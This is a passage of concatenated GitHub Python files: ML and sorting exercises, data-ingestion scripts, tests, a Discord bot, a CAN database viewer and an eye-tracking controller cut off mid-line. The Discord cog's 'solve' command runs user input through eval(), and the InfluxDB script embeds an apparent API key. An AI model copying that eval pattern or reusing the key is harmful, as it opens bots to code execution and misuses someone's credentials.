self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\n","repo_name":"qzonic/NextLevel","sub_path":"phonebook/api/tests/test_contact.py","file_name":"test_contact.py","file_ext":"py","file_size_in_byte":8247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"18709412027","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jan 18 18:25:00 2016\n\n@author: meil\n\nKNN\n\nInput:\npath,k\n\nOutput:\nfinalclass\n\nParameter:\ndistFun\n\n\"\"\"\nimport sys\nimport io\nfrom numpy import *\nimport math\nimport operator\n\ndef loaddataset(path):\n \n fp=open(path,'rb')\n content=fp.read()\n fp.close()\n rowlist=content.splitlines()\n \n dataset=[row.split('\\t') for row in rowlist if row.strip()]\n \n return dataset\n \ndef file2matrix(dataset):\n \n dataset=array(dataset)\n m,n=shape(dataset)\n trainset=zeros((m,n-1))\n labels=ones((m,1),dtype=str)\n for i in xrange(m):\n for j in xrange(n-1):\n trainset[i,j]=float(dataset[i,j])\n \n labels=dataset[:,-1]\n \n return trainset,labels\n \ndef KNN(trainset,labels,testvec,k):\n\n m,n=shape(trainset)\n traindata=trainset\n distdic={}\n for i in xrange(m):\n dist=distEclud(traindata[i,:],testvec)\n distdic[i]=dist\n \n distlist=sorted(distdic.iteritems(),key=operator.itemgetter(1),reverse=False)\n \n classdict={}\n \n for i in xrange(k):\n label=labels[distlist[i][0]]\n classdict[label]=classdict.get(label,0)+1\n \n finalclass=sorted(classdict.iteritems(),key=operator.itemgetter(1),reverse=True)[0][0]\n \n return finalclass \n \ndef distEclud(vecA,vecB):\n return linalg.norm(vecA-vecB)\n \n\ndataset=loaddataset('testdata/knntrain.txt')\ntrainset,labels=file2matrix(dataset)\ntestvec=[14488,8.327,0.954]\nk=10\n\nfinalclass=KNN(trainset,labels,testvec,k)\n","repo_name":"JackMeiLong/ML.Practise","sub_path":"Classify/KNN.py","file_name":"KNN.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11961444810","text":"#pip install influxdb before running this script\r\nfrom influxdb import InfluxDBClient\r\nfrom datetime import datetime\r\nimport urllib\r\nimport json\r\nimport pandas as pd\r\nimport numpy as np\r\nimport time,schedule,threading\r\n\r\n#Set up the InfluxDB connection\r\nclient = InfluxDBClient(host='localhost', port=8086, database='tstest')#testDB')\r\nclient.get_list_database() #확인하기\r\nclient.switch_database('tstest')\r\n\r\n#api 소환\r\nurl='http://apis.data.go.kr/B552584/ArpltnInforInqireSvc/getCtprvnRltmMesureDnsty?serviceKey=zRFvHX1aXXCIImm6VM1r41s7qtk%2BZvLgs6in9M1REA4KFCxy9almfJetM4CgsUwUOATf7XkgGquTvNULLJtJ%2FA%3D%3D&returnType=json&numOfRows=100&pageNo=1&sidoName=%EB%B6%80%EC%82%B0&ver=1.0'\r\nresult =json.load(urllib.request.urlopen(url))\r\ndf2=pd.read_csv('구변환(중복제거).csv')\r\nco = []\r\npm10 = []\r\ndate = []\r\nstation = []\r\nfor i in range(len(result['response']['body']['items'])) :\r\n co.append(result['response']['body']['items'][i]['coValue'])\r\n pm10.append(result['response']['body']['items'][i]['pm10Value'])\r\n date.append(result['response']['body']['items'][i]['dataTime'])\r\n station.append(result['response']['body']['items'][i]['stationName'])\r\napi=pd.DataFrame({'CO':co,'PM10':pm10,'time':date,'측정소명':station})\r\napi1=pd.merge(api,df2,how='outer',on='측정소명').drop('측정소명',axis=1)\r\napi1.rename(columns={'지역':'region'},inplace=True)\r\napi1 = api1.replace('-',np.nan)\r\napi1=api1.fillna(method='ffill')\r\napi1['time']=pd.to_datetime(api1['time'])\r\n#print(api1)\r\n#Setup Payload 넣을 데이터 불러와서 넣으면 될듯\r\njson_payload = []\r\nfor y in range(len(api1)):\r\n data = {\r\n \"measurement\": \"newdatatest\",\r\n \"tags\":{\r\n \"region\": api1[\"region\"].iloc[y]\r\n\r\n },\r\n \"time\" : api1['time'].iloc[y], #실행하는 날짜 넣어보기 테스트용\r\n \"fields\":{\r\n \"PM10\": api1['PM10'].iloc[y],\r\n \"CO\":api1['CO'].iloc[y]\r\n }\r\n }\r\n json_payload.append(data) \r\n #Send payload to InfluxDB 디비에 집어 넣는 명령어\r\n print(data)\r\n\r\n# print(data)\r\n# \r\n\r\n# #Send payload to InfluxDB 디비에 집어 넣는 명령어\r\n# try:\r\n# client.write_points(json_payload)\r\n# except Exception as e: # 모든 예외의 에러 메시지를 출력할 때는 Exception을 사용\r\n# print('예외가 발생했습니다.', e)\r\n","repo_name":"sherpajun/PhythonPratice","sub_path":"infulxdb.py","file_name":"infulxdb.py","file_ext":"py","file_size_in_byte":2363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"36980758138","text":"from __future__ import absolute_import\n\nfrom sentry import tagstore\nfrom sentry.tagstore.models import EventTag\nfrom sentry.models import (\n Event, EventAttachment, EventMapping, File, ScheduledDeletion, UserReport\n)\nfrom sentry.tasks.deletion import run_deletion\nfrom sentry.testutils import TestCase\n\n\nclass DeleteEventTest(TestCase):\n def test_simple(self):\n project = self.create_project()\n group = self.create_group(\n project=project,\n )\n event = self.create_event(group=group)\n EventAttachment.objects.create(\n event_id=event.event_id,\n project_id=event.project_id,\n file=File.objects.create(\n name='hello.png',\n type='image/png',\n ),\n name='hello.png',\n )\n UserReport.objects.create(\n event_id=event.event_id,\n project_id=event.project_id,\n name='Jane Doe',\n )\n key = 'key'\n value = 'value'\n tk = tagstore.create_tag_key(\n project_id=project.id,\n environment_id=self.environment.id,\n key=key\n )\n tv = tagstore.create_tag_value(\n project_id=project.id,\n environment_id=self.environment.id,\n key=key,\n value=value\n )\n tagstore.create_event_tags(\n event_id=event.id,\n group_id=group.id,\n project_id=project.id,\n environment_id=self.environment.id,\n tags=[\n (tk.key, tv.value),\n ],\n )\n\n deletion = ScheduledDeletion.schedule(event, days=0)\n deletion.update(in_progress=True)\n\n with self.tasks():\n run_deletion(deletion.id)\n\n assert not Event.objects.filter(id=event.id).exists()\n assert not EventAttachment.objects.filter(\n event_id=event.event_id,\n project_id=project.id,\n ).exists()\n assert not EventMapping.objects.filter(\n event_id=event.event_id,\n project_id=project.id,\n ).exists()\n assert not UserReport.objects.filter(\n event_id=event.event_id,\n project_id=project.id,\n ).exists()\n assert not EventTag.objects.filter(event_id=event.id).exists()\n","repo_name":"GaryChen66/sentry","sub_path":"tests/sentry/deletions/test_event.py","file_name":"test_event.py","file_ext":"py","file_size_in_byte":2315,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"74107545207","text":"# Course: 2302-001\n# Author: Esteban Retana\n# Assignment: Practice sorting algorithms\n# Instructor: Olac Fuentes\n# TA: Anindita Nath\n# Date of last modification:2/23/19\n# Purpose: Sort linked lists with different sorting algorithms and figure out their time complexity\n\nimport random\nimport time\n\n#Node Functions\nclass Node(object):\n # Constructor\n def __init__(self, item, next=None): \n self.item = item\n self.next = next \n \ndef PrintNodes(N):\n if N != None:\n print(N.item, end=' ')\n PrintNodes(N.next)\n \ndef PrintNodesReverse(N):\n if N != None:\n PrintNodesReverse(N.next)\n print(N.item, end=' ')\n \n#List Functions\nclass List(object): \n # Constructor\n def __init__(self): \n self.head = None\n self.tail = None\n \ndef IsEmpty(L): \n return L.head == None \n \ndef Append(L,x): \n # Inserts x at end of list L\n if IsEmpty(L):\n L.head = Node(x)\n L.tail = L.head\n else:\n L.tail.next = Node(x)\n L.tail = L.tail.next\n \ndef Print(L):\n # Prints list L's items in order using a loop\n temp = L.head\n while temp is not None:\n print(temp.item, end=' ')\n temp = temp.next\n print() # New line \n\ndef PrintRec(L):\n # Prints list L's items in order using recursion\n PrintNodes(L.head)\n print() \n \ndef Remove(L,x):\n # Removes x from list L\n # It does nothing if x is not in L\n if L.head==None:\n return\n if L.head.item == x:\n if L.head == L.tail: # x is the only element in list\n L.head = None\n L.tail = None\n else:\n L.head = L.head.next\n else:\n # Find x\n temp = L.head\n while temp.next != None and temp.next.item !=x:\n temp = temp.next\n if temp.next != None: # x was found\n if temp.next == L.tail: # x is the last node\n L.tail = temp\n L.tail.next = None\n else:\n temp.next = temp.next.next\n \ndef PrintReverse(L):\n # Prints list L's items in reverse order\n PrintNodesReverse(L.head)\n print() \n# Create a clone of the linked list \ndef Copy(L):\n temp = L.head\n new_copy = List()\n while temp != None:\n Append(new_copy, temp.item)\n temp = temp.next\n\n return new_copy \n# Obtain item by traversing through the list\ndef ElementAt(L,x):\n temp = L.head\n\n for i in range(x):\n temp = temp.next\n\n return temp.item\n# Get the size of the Linked list\ndef GetLength(L):\n temp = L.head\n i = 0\n while temp != None:\n i += 1\n temp = temp.next\n\n return i\n\ndef Median(L):\n C = Copy(L)\n return ElementAt(C,GetLength(C)//2)\n \n# Create random list of integers\ndef random_list():\n L = List()\n for x in range(5):\n n = random.randint(0,46)\n Append(L, n)\n return L\n\n# Bubble sort algorithm\ndef Bubble_sort(L):\n if IsEmpty(L):\n return\n\n if L.head != None and L.head.next == None :\n return L.head.item\n\n if L != None:\n temp = L.head\n is_sorting = True\n while is_sorting:\n temp = L.head\n is_sorting = False\n while temp.next != None:\n if temp.item > temp.next.item:\n is_sorting = True\n int_temp = temp.item\n temp.item = temp.next.item\n temp.next.item = int_temp\n temp = temp.next\n\n return Median(L)\n\ndef Split_list(L):\n if L == None:\n return L\n after = L.next\n before = L\n\n while after != None:\n after = after.next\n if after != None:\n before = before.next\n after=after.next\n return before\n\ndef Merge(L,K):\n combined = None\n # If a list is shorter than the other\n if L == None:\n return K\n if K == None:\n return L\n # L is less than, therefore L is inserted first\n if L.item <= K.item:\n combined = L\n combined.next = Merge(L.next, K) \n # K is less than, therefore K is inserted first\n else:\n combined = K\n combined.next = Merge(L, K.next) \n\n return combined \n\ndef Merge_sort(L):\n # If list is empty or only one element\n if L == None or L.next == None:\n return L\n\n if L != None:\n mid = Split_list(L)\n r = mid.next\n\n mid.next = None\n\n left = Merge_sort(L)\n right = Merge_sort(r)\n # j = Merge_sort(right)\n sorted_list = Merge(left,right)\n\n # final_list = List()\n # final_list.head = sorted_list\n return sorted_list\n \nC = random_list()\n# Print(C)\n\nL = Copy(C)\n\nPrint(L)\nprint(Bubble_sort(L))\nPrint(L)\n\nL = Copy(C)\n# Print(L)\nk = List()\n# start_time = time.time()\nPrint(k)\nk.head = Merge_sort(L.head)\nPrint(k)\n# end_time = time.time() - start_time\n# print(end_time)\nprint(Median(k))\n\n","repo_name":"eretana238/CS2302","sub_path":"Lab2/Lab2.py","file_name":"Lab2.py","file_ext":"py","file_size_in_byte":4943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"33556770120","text":"import cv2\nimport dlib\nimport glob\nimport os\n\n\nOUTPUT_PARENT_DIR = \"output\"\nos.makedirs(OUTPUT_PARENT_DIR, exist_ok=True)\n\nLANDMARK_COUNT = 68\n\ndetector = dlib.get_frontal_face_detector()\npredictor = dlib.shape_predictor(\"shape_predictor_68_face_landmarks.dat\")\n\nprint(\"******************* PROCESSING STARTED *******************\\n\\n\")\n\nfor file in glob.glob(\"./data/Deepfakes/*.mp4\"):\n path, filename = os.path.split(file)\n print(\"Currently processing video: \" + filename)\n video_name = os.path.splitext(filename)[0]\n\n '''\n Each video has a corresponding directory,\n under which, each file is a single frame,\n in which, in line is a landmark coordinate\n '''\n\n OUTPUT_LANDMARK_DIR = os.path.join(OUTPUT_PARENT_DIR, video_name)\n os.makedirs(OUTPUT_LANDMARK_DIR, exist_ok=True)\n\n cap = cv2.VideoCapture(\"./data/Deepfakes/\" + video_name + \".mp4\")\n\n frame_count = 0\n\n while cap.isOpened():\n success, frame = cap.read()\n current_frame_landmark = []\n if success:\n # cv2.imshow('window-name', frame)\n frame_count = frame_count + 1\n frame_gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) # To speed up detection by converting to grayscale\n faces = detector(frame_gray)\n for face in faces:\n landmarks = predictor(frame_gray, face)\n count = 0\n for n in range(LANDMARK_COUNT):\n x = landmarks.part(n).x\n y = landmarks.part(n).y\n current_frame_landmark.append([x, y])\n count += 1\n if current_frame_landmark:\n file_name = \"frame_\" + str(frame_count) + \".txt\"\n complete_file_name = os.path.join(OUTPUT_LANDMARK_DIR, file_name)\n file = open(complete_file_name, \"w\")\n\n for x, y in current_frame_landmark:\n file.write(str(x) + \" \" + str(y) + \"\\n\")\n file.close()\n else:\n break\n if cv2.waitKey(10) & 0xFF == ord('q'):\n break\n\n cap.release()\n cv2.destroyAllWindows() # destroy all opened windows\n\nprint(\"\\n\\n***********Processing Done! Checkout './output' directory for results.***********\")\n","repo_name":"ChangyuYan/Forensic-Face-Warping","sub_path":"video_dlib_marker.py","file_name":"video_dlib_marker.py","file_ext":"py","file_size_in_byte":2253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"26081066441","text":"import discord\nfrom discord import Embed\nfrom discord.ext import commands\nimport datetime\nfrom googlesearch import search as gsearch\n\n\nclass Misc(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n \n @commands.command(aliases=[\"server\"])\n async def serverinfo(self, ctx):\n humanCount=len([m for m in ctx.guild.members if not m.bot])\n print(ctx.guild.members)\n print(humanCount)\n botCount=ctx.guild.member_count-humanCount\n owner=ctx.guild.owner\n icon=str(ctx.guild.icon_url)\n name=str(ctx.guild.name)\n text_channels=len(ctx.guild.text_channels)\n voice_channels = len(ctx.guild.voice_channels)\n role_count = len(ctx.guild.roles)\n created = ctx.guild.created_at.strftime(\"%m-%d-%Y %H:%M%p\")\n \n embed1=Embed(timestamp=ctx.message.created_at,color=ctx.author.color,title=name+\" Server Info\")\n embed1.set_thumbnail(url=icon)\n embed1.add_field(name=\"Human Count\",value=humanCount)\n embed1.add_field(name=\"Bot Count\",value=botCount)\n embed1.add_field(name=\"Owner\",value=owner)\n embed1.add_field(name=\"Text Channels\",value=text_channels)\n embed1.add_field(name=\"Voice Channels\",value=voice_channels)\n embed1.add_field(name=\"Role Count\",value=role_count)\n embed1.add_field(name=\"Created On\",value=created)\n await ctx.send(embed=embed1)\n @commands.command()\n async def search(ctx,results=10,*argv):\n query=\" \".join(argv)\n if query==None:\n await ctx.send('You need to enter a query...')\n else:\n embed=discord.Embed(title='Results for '+query+':')\n results=gsearch(query,lang='en',num_results=results)\n for i in results:\n embed.add_field(name='Search Result:',value=i,inline=False)\n await ctx.send(embed=embed)\n @commands.command()\n async def solve(ctx,e):\n try:\n embed=discord.Embed(title=\"Answer:\",description=\"Your problem returned with the answer {}\".format(eval(e)))\n await ctx.send(embed=embed)\n except:\n await ctx.send(\"Oh no! Something went wrong\")\n \n\n\n\n \n \n\n\n \n\ndef setup(bot):\n bot.add_cog(Misc(bot))\n","repo_name":"theRandom12/Omni","sub_path":"bot/cogs/misc.py","file_name":"misc.py","file_ext":"py","file_size_in_byte":2251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"38019332167","text":"import random\nimport time\nimport tracemalloc\n\ntracemalloc.start()\n\n\ndef main():\n\n gerador = random.Random()\n\n cont = 0\n for i in range(1005000):\n if cont < 9:\n print(f\"{gerador.randint(0, 999)},\", end=\"\")\n cont += 1\n else:\n print(f\"{gerador.randint(0, 999)} \")\n cont = 0\n\n\nif __name__ == \"__main__\":\n\n inicio = time.time()\n main()\n fim = time.time()\n tracemalloc.stop() # Para a medição de memória\n\n current, peak = tracemalloc.get_traced_memory()\n print(f\"Memória utilizada: {memory_stats[0] / (1024 * 1024)} MB\")\n print(f\"Pico de memória: {memory_stats[1] / (1024 * 1024)} MB\")\n tempo_execucao = (fim - inicio) * 1000\n print(f\"Tempo de execução: {tempo_execucao:.2f} milissegundos\")\n\n with open(\"NaoOrdenado.txt\", \"a\") as file:\n file.write('\\n')\n file.write(\n f\"Tempo de execução: {tempo_execucao:.2f} milissegundos, Pico de uso de memória: {peak / 10**6} MB\\n\")\n","repo_name":"akyla007/TopicosDois","sub_path":"Atividade1/NaoOrdenado.py","file_name":"NaoOrdenado.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"32808920533","text":"# https://leetcode.com/explore/challenge/card/june-leetcoding-challenge/539/week-1-june-1st-june-7th/3351/\n\nfrom random import random\n\nclass Solution:\n\n def __init__(self, w: List[int]):\n self.cumsums = []\n cumsum = 0\n for n in w:\n cumsum += n\n self.cumsums.append(cumsum)\n\n def pickIndex(self) -> int:\n t = self.cumsums[-1] * random()\n for i, cumsum in enumerate(self.cumsums):\n if t < cumsum:\n return i\n\n \n# Your Solution object will be instantiated and called as such:\n# obj = Solution(w)\n# param_1 = obj.pickIndex()","repo_name":"rmodi6/scripts","sub_path":"practice/Leetcode/3351_random_pick_with_weight.py","file_name":"3351_random_pick_with_weight.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"20328380455","text":"import logging\nfrom contextlib import contextmanager\n\n\ndef init_logger():\n logger = logging.getLogger()\n logger.addHandler(logging.StreamHandler())\n logger.setLevel(logging.INFO)\n\n\n@contextmanager\ndef pause(vmi):\n vmi.pause_vm()\n try:\n yield\n finally:\n vmi.resume_vm()\n","repo_name":"OA136/lib","sub_path":"python-libvmi/examples/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74881754809","text":"#! /usr/bin/env python3\n\nfrom typing import List\nfrom graphviz import Digraph\nfrom graphviz.backend import render\nimport cantools\nimport click\nimport subprocess\nimport pathlib\nimport os\nimport tempfile\n\ndef sort_messages_by_CAN_id(msgs: list):\n i = 0\n while (i < len(msgs) - 2):\n if msgs[i].frame_id > msgs[i + 1].frame_id:\n tmp = msgs[i]\n msgs[i] = msgs[i+1]\n msgs[i+1] = tmp\n i = 0\n i += 1\n return msgs\n\ndef messages_from_a_to_b(messages: cantools.db.Message,\n senders: List[str],\n receivers: List[str]):\n \"\"\"return all messages sent from any ecu_a to any ecu_b\"\"\"\n matching_messages = []\n msgs_to_search = [msg for msg in messages if any([sender in msg.senders for sender in senders])]\n for msg in msgs_to_search:\n for receiver in receivers:\n if any([receiver in sig.receivers for sig in msg.signals]):\n matching_messages.append(msg)\n return matching_messages\n\ndef to_hex_str(val: float):\n return hex(int(val * 255))[2:]\n\ndef color_str_for_msg(msg, min_id=0, max_id=0x7FF):\n \"\"\" makes lines representing higher priority (lower CAN ID) red \"\"\"\n fmt = \"#{red}00{blue}\"\n id_range = max_id - min_id\n if id_range:\n norm = (msg.frame_id - min_id) / id_range\n else:\n norm = 0.5\n\n # higher priority is more red\n out = fmt.format(red=to_hex_str(1-norm), blue=to_hex_str(norm))\n\n return out\n\ndef fmt_msg_name(msg):\n return f\"{msg.name}\\n{hex(msg.frame_id)} ({msg.frame_id})\"\n\ndef get_node_names(db: cantools.db.Database):\n return list(set([node.name for node in db.nodes]))\n\ndef get_edges(db: cantools.db.Database,\n senders: List[str]=[],\n receivers: List[str]=[]):\n\n # Sort the messages so they appear in order of increasing CAN ID\n sorted_messages = sort_messages_by_CAN_id(db.messages)\n\n edges = []\n for sender in senders:\n for receiver in receivers:\n for msg in messages_from_a_to_b(sorted_messages, [sender], [receiver]):\n edges.append((sender, receiver, msg))\n return edges\n\ndef dbcview(graph_name: str, edges, output_dir: str):\n \"\"\"\n display a graph of messages in a DBC\n save to PDF in output dir\n \"\"\"\n\n g = Digraph(name=graph_name, filename=graph_name.replace(' ', '_'))\n\n min_id = min([msg.frame_id for _, _, msg in edges])\n max_id = max([msg.frame_id for _, _, msg in edges])\n\n for sender, receiver, msg in edges:\n g.edge(tail_name=sender,\n head_name=receiver,\n label=fmt_msg_name(msg),\n color=color_str_for_msg(msg,\n min_id=min_id,\n max_id=max_id))\n \n g.view(cleanup=True, directory=output_dir)\n\ndef main(dbc_filename: str,\n nodes: List[str]=[],\n senders: List[str]=[],\n receivers: List[str]=[],\n ignore: List[str]=[],\n output_dir: str=\"\"):\n\n db = cantools.db.load_file(dbc_filename)\n\n all_nodes = get_node_names(db)\n if all_nodes == []:\n print(\"No nodes found in this DBC!\")\n return\n\n # Check for invalid node names\n nonexistent_nodes = [n for n in nodes + senders + receivers + ignore if n not in all_nodes]\n if nonexistent_nodes:\n print(f\"specified nodes: [{', '.join(nonexistent_nodes)}] not found in {dbc_filename}\")\n print(f\"nodes in this file: [{', '.join(get_node_names(db))}]\")\n return\n\n all_nodes = [n for n in all_nodes if n not in ignore]\n \n \"\"\"\n If just a list of nodes, assume user wants to see everything into/out of those nodes.\n \"\"\" \n if nodes:\n all_receievers = list(set(nodes + all_nodes))\n all_senders = all_receievers\n elif senders or receivers:\n all_receievers = receivers or all_nodes\n all_senders = senders or all_nodes\n else:\n all_receievers = all_nodes\n all_senders = all_nodes\n\n edges = get_edges(db, all_senders, all_receievers)\n if not edges:\n print(f\"No edges found between {all_senders} and {all_receievers}\")\n\n graph_name = pathlib.Path(dbc_filename).stem\n if set(senders) != set(receivers):\n sender_expr = f\"from {' '.join(senders)}\" if senders else \"\"\n receiver_expr = f\"to {' '.join(receivers)}\" if receivers else \"\"\n if sender_expr or receiver_expr:\n graph_name += f\" {sender_expr} {receiver_expr}\"\n\n output_dir = output_dir if os.path.isdir(output_dir) else tempfile.TemporaryDirectory().name\n\n dbcview(graph_name, edges, output_dir)\n\n@click.command(short_help=\"NODES - comma separated list of nodes, Eg MOT,CHG. Defaults to all\")\n@click.argument('filename', type=click.Path(exists=True))\n@click.argument('nodes', nargs=-1)\n@click.option('-s', '--senders', help=\"comma separated list of sending nodes\", default=\"\")\n@click.option('-r', '--receivers', help=\"comma separated list of receiving nodes\", default=\"\")\n@click.option('-i', '--ignore', help=\"comma separated list of nodes to ignore\", default=\"\")\n@click.option('-o', help=\"Output dir for PDF (defaults to tmp)\", default='', type=click.Path())\ndef cli(filename, nodes, senders, receivers, ignore, o):\n main(filename,\n list(nodes),\n senders.split(',') if senders else [],\n receivers.split(',') if receivers else [],\n ignore.split(',') if ignore else [],\n o)\n\nif __name__ == '__main__':\n cli()\n","repo_name":"driftregion/dbcview","sub_path":"dbcview.py","file_name":"dbcview.py","file_ext":"py","file_size_in_byte":5479,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"74069332728","text":"#!/usr/bin/env python3\nimport importlib\nimport pathlib\n\nfrom setuptools import find_packages, setup\n\nWORK_DIR = pathlib.Path(__file__).parent\n\n\ndef get_version():\n \"\"\"\n Read version\n :return: str\n \"\"\"\n return importlib.import_module(\"pytitle_cli\").__version__\n\n\ndef get_description():\n \"\"\"\n Read full description from 'README.md'\n :return: description\n :rtype: str\n \"\"\"\n with open(\"README.md\", \"r\", encoding=\"utf-8\") as f:\n return f.read()\n\n\nsetup(\n name=\"pytitle\",\n version=get_version(),\n packages=find_packages(\n exclude=(\n \"tests\",\n \"tests.*\",\n \"examples.*\",\n \"docs\",\n )\n ),\n url=\"https://github.com/sina-e/pytitle_cli\",\n license=\"MIT\",\n author=\"Sina Ebrahimi\",\n python_requires=\">=3.8\",\n author_email=\"ebrahimisina78@gmail.com\",\n description=\"Command line tool for editing and manipulating subtitles.\",\n long_description=get_description(),\n long_description_content_type=\"text/markdown\",\n classifiers=[\n \"Development Status :: 2 - Pre-Alpha\",\n \"Environment :: Console\",\n \"Intended Audience :: End Users/Desktop\",\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 3.8\",\n \"Programming Language :: Python :: 3.9\",\n \"Programming Language :: Python :: 3.10\",\n \"Topic :: Multimedia :: Video\",\n \"Topic :: Text Processing\",\n \"Typing :: Typed\",\n ],\n keywords=[\n \"subtitle\",\n \"subtitles\",\n \"subtitle-manipulation\",\n \"subtitle-manipulation-library\",\n \"subtitle-manipulation-python\",\n \"srt-subtitles\",\n \"vtt-subtitles\",\n \"ssa-subtitles\",\n \"ass-subtitles\",\n \"srt\",\n \"vtt\",\n \"ass\",\n \"ssa\",\n \"subtitle-edit\",\n \"subtitle-editor\",\n ],\n install_requires=[\n \"pytitle==0.1.6\",\n \"typer==0.4.1\",\n ],\n extras_require={},\n project_urls={\n \"Documentation\": \"https://pytitle-cli.readthedocs.io\",\n \"Source\": \"https://github.com/sina-e/pytitle-cli\",\n },\n include_package_data=False,\n)\n","repo_name":"pytitle/PyTitle-cli","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2200,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"70372941690","text":"'''\nPerforms the iteration for a Ax = b style problem.\nFor Jacobi, A = D(A)^-1*A and b = D(A)^-1*b\n'''\nimport numpy as np\n\ndef iterate(A, x, b):\n I = np.identity(np.size(x))\n x = np.dot((I - A), x) + b \n return(x)","repo_name":"Avd6977/me701","sub_path":"Richardson_Solver/iterate.py","file_name":"iterate.py","file_ext":"py","file_size_in_byte":222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73830965369","text":"import celery\n\nfrom mutagen import mp3 as mutagen_mp3\n\nfrom creator import models\n\n\n@celery.shared_task\ndef sort_chapters(episode_id):\n \"\"\"\n Recalculate and fill in the start and end times on all chapters\n \"\"\"\n episode = models.Episode.objects.get(\n id=episode_id,\n processed=False,\n )\n mp3_file = mutagen_mp3.MP3(episode.mp3.file)\n mp3_end_time = int(mp3_file.info.length * 1000)\n chapters = models.Chapter.objects.filter(\n episode=episode\n ).order_by(\"-start_time\")\n\n previous_start_time = None\n for chapter in chapters:\n if not chapter.end_time:\n if previous_start_time is None:\n chapter.end_time = mp3_end_time\n else:\n chapter.end_time = previous_start_time - 1\n chapter.save()\n previous_start_time = chapter.start_time\n","repo_name":"Apreche/frontrowcrew","sub_path":"creator/tasks/sort_chapters.py","file_name":"sort_chapters.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"75035080249","text":"import cv2\nfrom mc_controller import minecraft_controller\nfrom websurfing_controller import websurfing_controller\nimport keyboard\nimport pynput\nimport threading\n\nactive_mode = 'minecraft' # default to web mode\n\ndef toggle_mode(e):\n global active_mode\n if active_mode == 'web':\n print(\"Switching to Minecraft Mode\")\n active_mode = 'minecraft'\n else:\n print(\"Switching to Web Surfing Mode\")\n active_mode = 'web'\n\nkeyboard.on_press_key(\"f4\", toggle_mode)\n\nimport time\nimport adhawkapi\nimport adhawkapi.frontend\nimport numpy as np\nimport cv2\nimport threading\nimport math, os\n\nimport sys\nfrom PyQt6.QtWidgets import QApplication, QWidget\nfrom PyQt6.QtCore import Qt\nfrom PyQt6.QtGui import QPainter, QBrush, QColor\nimport pyautogui\n\n\npyautogui.FAILSAFE = False\nMOUSE = pynput.mouse.Controller()\n\n# get monitor res\nfrom screeninfo import get_monitors\n\nclass SmoothedValue:\n def __init__(self, alpha=0.5):\n self.alpha = alpha\n self.prev_value = None\n\n def get(self, value):\n if self.prev_value is None:\n self.prev_value = value\n smoothed_value = self.alpha * value + (1 - self.alpha) * self.prev_value\n self.prev_value = smoothed_value\n return smoothed_value\n\nclass SmoothEyeTracker:\n def __init__(self, wa, wb):\n self.a, self.b = wa, wb\n self.wp = (0,0)\n self.s = 80\n \n def next_pos(self, x, y):\n dx, dy = x - self.wp[0], y - self.wp[1]\n res = [self.wp[0] + dx / self.s, self.wp[1] + dy / self.s]\n # res[0] += dx / 10\n # res[1] += dy / 10\n\n self.wp = (x, y)\n return res\n\nclass SmallWindow(QWidget):\n def __init__(self, title, x, y, w = 40, h = 40):\n super().__init__()\n\n # Set window title and position\n self.setWindowTitle(title)\n self.setGeometry(x, y, w, h) # x, y, width, height\n\n self.setWindowFlags(Qt.WindowType.FramelessWindowHint | Qt.WindowType.WindowStaysOnTopHint)\n self.setStyleSheet(\"background-color: rgba(255, 0, 255, 255);\")\n\n def keyPressEvent(self, event):\n # check if escape key\n if event.key() == Qt.Key.Key_Escape:\n QApplication.instance().quit() # Close the application\n\n\n# --------------------------------------------------\n\n\n\nframe = None # Declare global frame to be accessed in multiple functions\nxvec, yvec, zvec = 0.0, 0.0, 0.0 # Initialize gaze vector components to some default values\n\n\n\n# convert 15 inch to meters\nCSECTION = 15\nWIDTH = 13.4\nHEIGHT = 9.4\n\n# 1 inch = 0.0254 meters\nCOMPUTER_CSECTION = 0.0254 * CSECTION\n\nCOUNTER = 0\n\n# HSV_RANGE = [np.array((60, 0, 0)), np.array((85, 100, 100))] # green\nHSV_RANGE = [np.array((135, 100, 200)), np.array((155, 160, 255))] # magenta\nC_LIMIT = 15\n\n\n\nclass FrontendData:\n def __init__(self):\n global xvec, yvec # Declare these as global\n self._api = adhawkapi.frontend.FrontendApi(ble_device_name='ADHAWK MINDLINK-296')\n self._api.register_stream_handler(adhawkapi.PacketType.EYETRACKING_STREAM, self._handle_et_data)\n self._api.register_stream_handler(adhawkapi.PacketType.EVENTS, self._handle_events)\n self._api.start(tracker_connect_cb=self._handle_tracker_connect,\n tracker_disconnect_cb=self._handle_tracker_disconnect)\n\n def shutdown(self):\n self._api.shutdown()\n\n @staticmethod\n def _handle_et_data(et_data: adhawkapi.EyeTrackingStreamData):\n global COUNTER, xvec, yvec # Declare these as 